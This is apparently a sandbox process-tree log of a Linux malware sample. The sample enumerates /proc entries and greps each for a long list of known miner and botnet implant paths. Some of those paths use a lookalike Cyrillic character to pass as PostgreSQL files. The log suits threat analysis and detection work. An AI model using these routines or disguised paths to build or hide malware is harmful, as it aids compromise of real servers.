/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1040
-
-
/bin/grepgrep exe2⤵PID:1044
-
-
/bin/lsls -latrh /proc/7162⤵PID:1043
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1047
-
-
/bin/grepgrep exe2⤵PID:1050
-
-
/bin/lsls -latrh /proc/722⤵PID:1049
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1054
-
-
/bin/grepgrep exe2⤵PID:1058
-
-
/bin/lsls -latrh /proc/7222⤵PID:1057
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1061
-
-
/bin/grepgrep exe2⤵PID:1064
-
-
/bin/lsls -latrh /proc/732⤵PID:1063
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1068
-
-
/bin/grepgrep exe2⤵PID:1073
-
-
/bin/lsls -latrh /proc/7312⤵PID:1072
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1076
-
-
/bin/grepgrep exe2⤵PID:1080
-
-
/bin/lsls -latrh /proc/742⤵PID:1079
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1083
-
-
/bin/grepgrep exe2⤵PID:1087
-
-
/bin/lsls -latrh /proc/752⤵PID:1086
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1089
-
-
/bin/grepgrep exe2⤵PID:1093
-
-
/bin/lsls -latrh /proc/762⤵PID:1092
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1097
-
-
/bin/grepgrep exe2⤵PID:1100
-
-
/bin/lsls -latrh /proc/772⤵PID:1099
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1103
-
-
/bin/grepgrep exe2⤵PID:1106
-
-
/bin/lsls -latrh /proc/792⤵PID:1105
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1108
-
-
/bin/grepgrep exe2⤵PID:1111
-
-
/bin/lsls -latrh /proc/82⤵PID:1110
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1114
-
-
/bin/grepgrep exe2⤵PID:1117
-
-
/bin/lsls -latrh /proc/812⤵PID:1116
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1119
-
-
/bin/grepgrep exe2⤵PID:1122
-
-
/bin/lsls -latrh /proc/822⤵PID:1121
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1124
-
-
/bin/lsls -latrh /proc/842⤵PID:1126
-
-
/bin/grepgrep exe2⤵PID:1127
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1129
-
-
/bin/grepgrep exe2⤵PID:1132
-
-
/bin/lsls -latrh /proc/92⤵PID:1131
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1134
-
-
/bin/grepgrep exe2⤵PID:1137
-
-
/bin/lsls -latrh /proc/buddyinfo2⤵PID:1136
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1139
-
-
/bin/grepgrep exe2⤵PID:1142
-
-
/bin/lsls -latrh /proc/bus2⤵PID:1141
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1144
-
-
/bin/grepgrep exe2⤵PID:1147
-
-
/bin/lsls -latrh /proc/cgroups2⤵PID:1146
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1149
-
-
/bin/grepgrep exe2⤵PID:1152
-
-
/bin/lsls -latrh /proc/cmdline2⤵PID:1151
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1154
-
-
/bin/grepgrep exe2⤵PID:1157
-
-
/bin/lsls -latrh /proc/consoles2⤵PID:1156
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1159
-
-
/bin/grepgrep exe2⤵PID:1162
-
-
/bin/lsls -latrh /proc/cpuinfo2⤵PID:1161
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1164
-
-
/bin/grepgrep exe2⤵PID:1167
-
-
/bin/lsls -latrh /proc/crypto2⤵PID:1166
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1169
-
-
/bin/grepgrep exe2⤵PID:1172
-
-
/bin/lsls -latrh /proc/devices2⤵PID:1171
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1174
-
-
/bin/grepgrep exe2⤵PID:1177
-
-
/bin/lsls -latrh /proc/device-tree2⤵PID:1176
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1179
-
-
/bin/grepgrep exe2⤵PID:1182
-
-
/bin/lsls -latrh /proc/diskstats2⤵PID:1181
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1184
-
-
/bin/grepgrep exe2⤵PID:1187
-
-
/bin/lsls -latrh /proc/dma2⤵PID:1186
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1189
-
-
/bin/grepgrep exe2⤵PID:1192
-
-
/bin/lsls -latrh /proc/driver2⤵PID:1191
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1194
-
-
/bin/grepgrep exe2⤵PID:1197
-
-
/bin/lsls -latrh /proc/execdomains2⤵PID:1196
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1199
-
-
/bin/grepgrep exe2⤵PID:1202
-
-
/bin/lsls -latrh /proc/fb2⤵PID:1201
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1207
-
-
/bin/grepgrep exe2⤵PID:1210
-
-
/bin/lsls -latrh /proc/filesystems2⤵PID:1209
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1212
-
-
/bin/grepgrep exe2⤵PID:1215
-
-
/bin/lsls -latrh /proc/fs2⤵PID:1214
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1217
-
-
/bin/grepgrep exe2⤵PID:1220
-
-
/bin/lsls -latrh /proc/interrupts2⤵PID:1219
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1222
-
-
/bin/grepgrep exe2⤵PID:1225
-
-
/bin/lsls -latrh /proc/iomem2⤵PID:1224
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1227
-
-
/bin/grepgrep exe2⤵PID:1230
-
-
/bin/lsls -latrh /proc/ioports2⤵PID:1229
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1232
-
-
/bin/grepgrep exe2⤵PID:1235
-
-
/bin/lsls -latrh /proc/irq2⤵PID:1234
-
-
